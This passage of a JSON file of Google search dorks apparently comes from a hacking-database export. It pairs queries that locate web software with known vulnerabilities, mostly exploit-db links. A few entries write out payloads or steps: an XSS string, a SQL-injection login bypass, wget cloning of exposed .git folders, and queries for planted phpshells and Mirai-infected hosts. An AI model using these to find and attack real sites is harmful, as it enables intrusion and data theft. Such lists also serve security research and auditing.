https://www.exploit-db.com/exploits/7259"}, {"dork": "\"Powered by: Yes Solutions\"", "description": "Yes Solutions - Webapp SQL Injection: https://www.exploit-db.com/exploits/11368"}, {"dork": "Powered by PBBoard\u00a9 2009 Version 2.0.5", "description": "PBBoard Version 2.0.5 Mullti Vulnerability: https://www.exploit-db.com/exploits/11570"}, {"dork": "inurl:/components/je-media-player.html?", "description": "Joomla JE Media Player Component LFI Vulnerability: https://www.exploit-db.com/exploits/14060"}, {"dork": "\"Forum Active Bulletin Board version 1.1 b\u00e9ta 2\"", "description": "Active Bulletin Board"}, {"dork": "inurl:module=My_eGallery pid", "description": "MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: https://www.exploit-db.com/exploits/8100"}, {"dork": "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media", "description": "Subdreamer.v3.0.1 cms upload Vulnerability: https://www.exploit-db.com/exploits/11749"}, {"dork": "\"These forums are running on\" \"miniBB\"", "description": "miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: https://www.exploit-db.com/exploits/4587"}, {"dork": "intext:\"Powered by Ramaas Software\"", "description": "Ramaas Software CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12412"}, {"dork": "Powered by Maian Greetings v2.1", "description": "Maian Greetings v2.1 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11301"}, {"dork": "\"Powered by [ iSupport 1.8 ]\"", "description": "iSupport 1.8 XSS/LFI - CVE: 2009-4434: https://www.exploit-db.com/exploits/10478"}, {"dork": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "description": "Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: https://www.exploit-db.com/exploits/2172"}, {"dork": "inurl:index.php?title=gamepage", "description": "PHP Gamepage SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12634"}, {"dork": "Powered by: Maian Uploader v4.0", "description": "Maian Uploader v4.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11571"}, {"dork": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "description": "Powder Blue Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12671"}, {"dork": "\"Powered by MetInfo 2.0\"", "description": "MetInfo 2.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15360"}, {"dork": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "description": "Marketing Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12788"}, {"dork": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "description": "eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: https://www.exploit-db.com/exploits/4154"}, {"dork": "\"Developed by Infoware Solutions\"", "description": "infoware SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12714"}, {"dork": "\"Powered by: MyPHP Forum\"", "description": "MyPHP Forum"}, {"dork": "Ayemsis Emlak Pro", "description": "Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7665"}, {"dork": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "description": "crownweb (page.cfm) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11299"}, {"dork": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "description": "Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: https://www.exploit-db.com/exploits/4804"}, {"dork": "inurl:\"contentPage.php?id=\" OR inurl:\"displayResource.php?id=\" AND intext:\"Website by Mile High Creative\"", "description": "MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12792"}, {"dork": "inurl:com_jepoll", "description": "Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12781"}, {"dork": "Come from home Script ( Latest Project ) www.esmart-vision.com", "description": "Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10977"}, {"dork": "\"powered by zomplog\"", "description": "Zomplog"}, {"dork": "Joomla Component com_eportfolio Upload Vulnerability", "description": "WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: https://www.exploit-db.com/exploits/7216"}, {"dork": "\"Site designed and built Powered by GlobalWebTek.\"", "description": "GlobalWebTek Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12761"}, {"dork": "Copyright \u00a92007-2009 by Kasseler CMS. All rights reserved.", "description": "Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability - CVE: 2009-4822: https://www.exploit-db.com/exploits/12402"}, {"dork": "inurl:inc_webblogmanager.asp", "description": "DMXReady Blog Manager"}, {"dork": "Powered by eLitius Version 1.0", "description": "eLitius 1.0 (manage-admin.php) Add Admin/Change Password: https://www.exploit-db.com/exploits/8459"}, {"dork": "inurl:index.php?option=com_races \"raceId\"", "description": "Joomla Component com_races Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11710"}, {"dork": "inurl:/phpplanner/userinfo.php?userid=", "description": "phpplanner XSS / SQL Vulnerability: https://www.exploit-db.com/exploits/13847"}, {"dork": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "description": "PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: https://www.exploit-db.com/exploits/3524"}, {"dork": "\"Powered by ClanAdmin Tools v1.4.2\"", "description": "ClanWeb 1.4.2 Remote Change Password / Add Admin: https://www.exploit-db.com/exploits/8717"}, {"dork": "Powered by osCommerce | Customized by EZ-Oscommerce", "description": "EZ-Oscommerce 3.1 Remote File Upload: https://www.exploit-db.com/exploits/14415"}, {"dork": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "description": "Aim Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12791"}, {"dork": "Powered by One-News", "description": "OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/6292"}, {"dork": "\"Powered by PHP Director\"", "description": "PHPDirector"}, {"dork": "\"Webdesign Cosmos Solutions\"", "description": "Cosmos Solutions cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12793"}, {"dork": "\"Site designed and built by ProWeb Associates.\"", "description": "ProWeb Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12730"}, {"dork": "\"Powered By Basic CMS SweetRice\"", "description": "SweetRice 0.6.4 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/14184"}, {"dork": "inurl:index.php?option=com_liveticker \"viewticker\"", "description": "Joomla Component com_liveticker Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11604"}, {"dork": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "description": "Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9460"}, {"dork": "\"Devana is an open source project !\"", "description": "Devana SQL Injection vulnerability - CVE: 2010-2673: https://www.exploit-db.com/exploits/11922"}, {"dork": "\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "description": "toronja cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12770"}, {"dork": "E-Commerce Engine Copyright \u00a9 2005 osCSS", "description": "osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: https://www.exploit-db.com/exploits/12856"}, {"dork": "Powered by Ac4p.com Gallery v1.0 , Copyright\u00a9 2007 ac4p.com", "description": "Ac4p.com Gallery v1.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11519"}, {"dork": "Powered by Digital College 1.0 - Magtrb Soft 2010", "description": "Digital College 1.0 Upload Vulnerability: https://www.exploit-db.com/exploits/12568"}, {"dork": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "description": "Wordpress Plugin e-Commerce"}, {"dork": "intitle:\"igenus webmail login\"", "description": "iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: https://www.exploit-db.com/exploits/1527"}, {"dork": "\"Powered by FreeWebshop\"", "description": "FreeWebshop"}, {"dork": "intext:\"Designed by Spaceacre\"", "description": "Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities: https://www.exploit-db.com/exploits/12746"}, {"dork": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "description": "e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: https://www.exploit-db.com/exploits/12818"}, {"dork": "\"S-CMS by matteoiamma\"", "description": "S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/8913"}, {"dork": "inurl:\"cal_day.php?op=day&catview=\"", "description": "Calendarix v0.8.20071118 SQL Injection: https://www.exploit-db.com/exploits/11443"}, {"dork": "netGitar.com - Shop v1.0", "description": "Net Gitar Shopv1.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11016"}, {"dork": "allinurl:fullview.php?tempid=", "description": "Template Seller Pro 3.25 (tempid) Remote SQL Injection: https://www.exploit-db.com/exploits/12360"}, {"dork": "www.stwc-counter.de", "description": "STWC-Counter"}, {"dork": "[ Powered by: RadLance v7.5 ]", "description": "RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: https://www.exploit-db.com/exploits/9195"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout 2.08 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12407"}, {"dork": "Powered by Comersus v6 Shopping Cart", "description": "Comersus Shopping Cart v6 Remote User Pass: https://www.exploit-db.com/exploits/7736"}, {"dork": "\"Powered by MobPartner\" inurl:\"chat.php\"", "description": "MobPartner Chat Multiple Sql Injection Vulnerabilities: https://www.exploit-db.com/exploits/11321"}, {"dork": "[ Content Copyright \u00c2\u00a9 2007 RadNics Gold ]", "description": "RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: https://www.exploit-db.com/exploits/9196"}, {"dork": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "description": "iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: https://www.exploit-db.com/exploits/5761"}, {"dork": "inurl:\"/modules/friendfinder/\"", "description": "XOOPS Module Friendfinder"}, {"dork": "allinurl:forum_answer.php?que_id=", "description": "AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: https://www.exploit-db.com/exploits/12372"}, {"dork": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "description": "EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12353"}, {"dork": "\"Copyright 2004 easy-content forums\"", "description": "Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: https://www.exploit-db.com/exploits/1834"}, {"dork": "\"Website by WebSolutions.ca\"", "description": "WsCMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12813"}, {"dork": "\"Powered by Nukedit\"", "description": "Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: https://www.exploit-db.com/exploits/5192"}, {"dork": "Powered by Gbook MX v4.1.0 \u00a92003 Magtrb Soft", "description": "Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10986"}, {"dork": "Powered by SLAED CMS \u00a9 2005-2008 SLAED. All rights reserved.", "description": "Slaed CMS v4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11596"}, {"dork": "myAlbum-P 2.0", "description": "XOOPS Module myAlbum-P"}, {"dork": "[ Software Directory Powered by SoftDirec 1.05 ]", "description": "Soft Direct v1.05 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11189"}, {"dork": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "description": "Geeklog v1.6.0sr2 - Remote File Upload: https://www.exploit-db.com/exploits/9855"}, {"dork": "inurl:\"xampp/biorhythm.php\"", "description": "XAMPP 1.7.3 multiple vulnerabilites: https://www.exploit-db.com/exploits/15370"}, {"dork": "inurl:\"/modules/glossaire/\"", "description": "XOOPS Module Glossarie"}, {"dork": "index.php?option=com_is", "description": "Joomla Component is 1.0.1 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/5995"}, {"dork": "Powered by Ninja Designs This is a port of WordPress", "description": "Ninja Blog v4.8 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10991"}, {"dork": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "description": "VP-ASP Shopping Cart 7.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11018"}, {"dork": "inurl:\"/modules/wfsection/\"", "description": "https://www.exploit-db.com/exploits/3644/"}, {"dork": "intext:\"phpbb - auction\" inurl:\"auction\"", "description": "Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: https://www.exploit-db.com/exploits/1747"}, {"dork": "Powered by Forums W-Agora", "description": "W-Agora v.4.2.1 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10999"}, {"dork": "intitle:admbook intitle:version filetype:php", "description": "Admbook 1.2.2 (X-Forwarded-For) Remote Command Execution - CVE: 2006-0852: https://www.exploit-db.com/exploits/1512"}, {"dork": "inurl:\"com_icrmbasic\"", "description": "Joomla IRCm Basic SQL Injection: https://www.exploit-db.com/exploits/9812"}, {"dork": "index.php?option=com_mambads", "description": "Mambo Component mambads"}, {"dork": "\"AlumniServer project\"", "description": "AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9019"}, {"dork": "Powered by PHP F1 (Max's Photo Album)", "description": "Max's Photo Album Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11557"}, {"dork": "\"Powered by LightNEasy\"", "description": "LightNEasy 3.1.x Multiple Vulnerabilite: https://www.exploit-db.com/exploits/12322"}, {"dork": "\"The Merchant Project\"", "description": "The Merchant"}, {"dork": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "description": "Apache Tomcat (webdav) Remote File Disclosure: https://www.exploit-db.com/exploits/4552"}, {"dork": "\"Search Projects\" intitle:\"The ultimate project website\"", "description": "Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: https://www.exploit-db.com/exploits/4660"}, {"dork": "Powered by Dodo, Bubo & Misty. Feed us!", "description": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: https://www.exploit-db.com/exploits/11460"}, {"dork": "allinurl:\"shop.htm?shopMGID=\"", "description": "CMS Ignition SQL Injection: https://www.exploit-db.com/exploits/14471"}, {"dork": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "description": "Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/9505"}, {"dork": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "description": "LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: https://www.exploit-db.com/exploits/1874"}, {"dork": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "description": "PmWiki"}, {"dork": "\"Powered by UPB\"", "description": "Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: https://www.exploit-db.com/exploits/2721"}, {"dork": "\"Powered by Claroline\" -demo", "description": "Claroline"}, {"dork": "\"Galerie 3.2 \u00c2\u00a9 2004 by progressive\"", "description": "Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: https://www.exploit-db.com/exploits/6675"}, {"dork": "\"Powered By Pligg\" + \"Legal: License and Source\"", "description": "Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: https://www.exploit-db.com/exploits/6172"}, {"dork": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "description": "toendaCMS 1.0.0 (FCKeditor) Remote File Upload: https://www.exploit-db.com/exploits/2035"}, {"dork": "\"Powered by cpCommerce\"", "description": "cpCommerce"}, {"dork": "\"propuls\u00c3\u00a9 par JBlog\"", "description": "JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: https://www.exploit-db.com/exploits/4211"}, {"dork": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "description": "PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: https://www.exploit-db.com/exploits/1993"}, {"dork": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "description": "Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: https://www.exploit-db.com/exploits/3739"}, {"dork": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "description": "Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: https://www.exploit-db.com/exploits/6428"}, {"dork": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "description": "PHP-Update"}, {"dork": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "description": "Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: https://www.exploit-db.com/exploits/1946/"}, {"dork": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "description": "Flatnuke 2.5.8 file() Priv Escalation / Code Execution: https://www.exploit-db.com/exploits/2498"}, {"dork": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hul\u00e1n\"", "description": "BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: https://www.exploit-db.com/exploits/1960"}, {"dork": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "description": "Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: https://www.exploit-db.com/exploits/2499"}, {"dork": "\"Powered by PHP Photo Album\"", "description": "phpAlbum"}, {"dork": "\"Site powered by GuppY\" | \"Site cr\u00e9\u00e9 avec GuppY\" +inurl:lng=", "description": "GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: https://www.exploit-db.com/exploits/3221"}, {"dork": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "description": "e107 0.75 (GLOBALS Overwrite) Remote Code Execution: https://www.exploit-db.com/exploits/2268"}, {"dork": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "description": "PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: https://www.exploit-db.com/exploits/2867"}, {"dork": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "description": "PHPList 2.10.2 GLOBALS[] Remote Code Execution: https://www.exploit-db.com/exploits/1659"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\"", "description": "SendCard 3.4.0 Unauthorized Administrative Access: https://www.exploit-db.com/exploits/2117"}, {"dork": "\"This is a Free & Open Source mailing list manager\"", "description": "Open Newsletter"}, {"dork": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "description": "X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156: \nhttps://www.exploit-db.com/exploits/1738"}, {"dork": "SmarterMail Enterprise 7.1", "description": "https://www.exploit-db.com/exploits/15185/"}, {"dork": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "description": "NOCC Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891: https://www.exploit-db.com/exploits/1522/"}, {"dork": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "description": "Matches some well known phpshells (r57 and the like)."}, {"dork": "inurl:\"?act=phpinfo\"", "description": "Match some well known phpshells (c99 and ironwarez and the like)."}, {"dork": "php Kolay Forum (php KF) \u00a9 2007 - 2010 phpKF Ekibi", "description": "Submitter: FreWaL CSRF Vulnerability: https://www.exploit-db.com/exploits/15685"}, {"dork": "\"Powered by SOOP Portal Raven 1.0b\"", "description": "Submitter: Sun Army - https://www.exploit-db.com/exploits/15703"}, {"dork": "inurl:\"produtos.asp?produto=\"", "description": "Submitter: Br0ly https://www.exploit-db.com/exploits/15776"}, {"dork": "inurl:com_jeauto", "description": "LFI: https://www.exploit-db.com/exploits/15779"}, {"dork": "allinurl:index.php?db=information_schema", "description": "Submitter: modpr0be phpMyAdmin Direct Access to information_schema Database"}, {"dork": "\"Powered by CubeCart 3.0.4\"", "description": "CSRF:https://www.exploit-db.com/exploits/15822"}, {"dork": "\"Website Design by Rocktime\"", "description": "Submitter: n0n0x http://server/product.php?fdProductId=[SQL Injection]"}, {"dork": "\"Powered by UNO.com.my\"", "description": "Submitter: SiKodoQ http://127.0.0.1/[path]/page.php?pid=[SQLi]"}, {"dork": "\"/index.php?id=cmp-noticias\"", "description": "Submitter: xoron http://server/index.php?id=cmp-noticias&n=[SQLi]"}, {"dork": "\"Powered by YourTube v1.0\"", "description": "Author: AtT4CKxT3rR0r1ST CSRF: https://www.exploit-db.com/exploits/15892"}, {"dork": "\"POWERED BY ALITALK\"", "description": "intext:\"POWERED BY ALITALK\""}, {"dork": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "description": "Author: DigiP Multiple Vulnerabilities: https://www.exploit-db.com/exploits/9296/"}, {"dork": "\"TinyBB 2011 all rights reserved\"", "description": "Submitter: Aodrulez SQL Injection: https://www.exploit-db.com/exploits/15961/"}, {"dork": "\"Powered by: PHP Link Directory\"", "description": "CSRF Vuln: https://www.exploit-db.com/exploits/16037/"}, {"dork": "Photo Gallery powered by TinyWebGallery 1.8.3", "description": "Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: https://www.exploit-db.com/exploits/16090"}, {"dork": "site:ebay.com inurl:callback", "description": "Returns:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?\nthen:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E\nCan also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters"}, {"dork": "http://www.google.com/#sclient=psy&hl=en&safe=off&site=&source=hp&q=:inurl%3Amj_wwwusr&aq=f&aqi=&aql=&oq=&pbx=1&fp=2dcb6979649afcb0", "description": "https://www.exploit-db.com/exploits/16103/"}, {"dork": "allintext: /qcodo/_devtools/codegen.php", "description": "Information Disclosure: https://www.exploit-db.com/exploits/16116"}, {"dork": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "description": "SQL Injection: https://www.exploit-db.com/exploits/16122"}, {"dork": "\"powered by zipbox media\"", "description": "Author:XaDaL http://site.com/album.php?id=[SQLi]"}, {"dork": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "description": "Author : AtT4CKxT3rR0r1ST \nSQL Injection: www.site.com/album.php?id=null[Sql]"}, {"dork": "intext:\"Powered by EZPub\"", "description": "SQL Injection: https://www.exploit-db.com/exploits/16941"}, {"dork": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "description": "vtiger CRM version 5.x presence\n--\nLiquidWorm"}, {"dork": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "description": "DIY-CMS blog mod SQL Injection. Author: snup"}, {"dork": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "description": "ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK"}, {"dork": "inurl:wp-content/plugins/age-verification/age-verification.php", "description": "Wordpress Age Verification Plugin \nhttps://www.exploit-db.com/exploits/18350"}, {"dork": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "description": "The server vulnerable to => CVE 2006-4602"}, {"dork": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "description": "Servers with vulnerability who exploit in this link:\nhttps://www.exploit-db.com/exploits/13850/\nDork by Rootkit Pentester."}, {"dork": "intext:\"Powered By OpenCart\" -site:opencart.com -inurl:\"Powered By OpenCart\" -intitle:\"OpenCart\" -intitle:\"powered by\"", "description": "Find Open Carts for Remote File Upload vulnerability.\nDecoy"}, {"dork": "inurl:\".php?cat=\" inurl:\"'\"", "description": "Finds sites vulnerable to SQL Injection!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/load.cgi\" ext:cgi", "description": "Finds more pages vulnerable to redirection\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"Access Denied\" \"Powered by Incapsula\" ext:php", "description": "Finds vulnerable pages that triggered Incapsula WAF\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "intitle:index of AND (intext:mirai.x86 OR intext:mirai.mips OR intext:mirai.mpsl OR intext:mirai.arm OR intext:mirai.arm7 OR intext:mirai.ppc OR intext:mirai.spc OR intext:mirai.m68k OR intext:mirai.sh4)", "description": "Description: Find servers infected with mirai\r\n\r\nAuthor: SadFud"}, {"dork": "allinurl:\"/wp-content/plugins/wp-noexternallinks\"", "description": "Dork to find the \"No External Links\" plugin vulnerable to XSS\r\n\r\n\"\"Error: Plugin does not support standalone calls, damned hacker.\"\"\r\n\r\n\r\n\r\n\r\n\r\nallinurl:\"/wp-content/plugins/wp-noexternallinks\"\r\n\r\n\r\n\r\nDrok3r"}, {"dork": "inurl:\"exit.php?url=\" -entry_id", "description": "Pages vulnerable to arbitrary redirection\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"pubdlcnt.php?file=\" ext:php", "description": "Finds EVEN MORE redirection vulnerabilities... Go crazy.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "intitle:\"Index of /\" \"mod_ssl 2.2.22 OpenSSL/1.0.1\"", "description": "Finds OpenSSL servers that are vulnerable to the Heartbleed Bug\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "filetype:ini \"wordfence\"", "description": "Google Dork: filetype:ini \"wordfence\"\r\n\r\n\r\n\r\nDescription: finds WordPress websites that are running the Wordfence WAF,\r\n\r\nand by proxy, reveals the full site directory path.\r\n\r\n\r\n\r\nAuthor: echobb8"}, {"dork": "inurl:\"/wp-admin/setup-config.php\" intitle:\"Setup Configuration File\"", "description": "Finds Wordpress unfinished installations.\r\n\r\nLike published at defcon:\r\n\r\nhttps://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf\r\n\r\n\r\n\r\nDork:\r\n\r\ninurl:\"/wp-admin/setup-config.php\" intitle:\"Setup Configuration File\"\r\n\r\n\r\n\r\nB0x41S\r\n\r\nX-ray IT"}, {"dork": "filetype:php \"Git Deployment Script v0.1\"", "description": "Query : filetype:php \"Git Deployment Script v0.1\"\nVulnerable php git deployment script : https://gist.github.com/oodavid/1809044\n- Discloses all files not contained in the git repository\n- Most users do not secure their .git folder so you can clone their repo\nFor a result [exemple.com/path/deploy.php](http://exemple.com/deploy.php)\n- wget -r -np exemple.com/path/.git/\n- cd ./exemple.com/path/.git/\n- git reset --hard\n- You have a copy of the website content\n- Cringe\nNate"}, {"dork": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "description": "myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507"}, {"dork": "inurl:inc_photogallerymanager.asp", "description": "DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7783"}, {"dork": "inurl:\"tr.php?id=\" Short Url & Url Tracker", "description": "YourFreeWorld Short Url & Url Tracker (id) SQL Injection Vuln - CVE: 2008-4885: https://www.exploit-db.com/exploits/6940"}, {"dork": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "description": "Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: https://www.exploit-db.com/exploits/3143"}, {"dork": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "description": "Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: https://www.exploit-db.com/exploits/1816"}, {"dork": "\"propuls\u00e9 par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "description": "DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: https://www.exploit-db.com/exploits/1869"}, {"dork": "\"powered by php photo album\" -demo2 -pitanje\"", "description": "PHP Album 0.3.2.3 Remote Command Execution: https://www.exploit-db.com/exploits/1678"}, {"dork": "\"Powered by kryCMS\"", "description": "kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan"}, {"dork": "inurl:custva.asp", "description": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."}, {"dork": "\"Powered by mnoGoSearch - free web search engine software\"", "description": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server."}, {"dork": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "description": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209"}, {"dork": "filetype:asp inurl:\"shopdisplayproducts.asp\"", "description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. 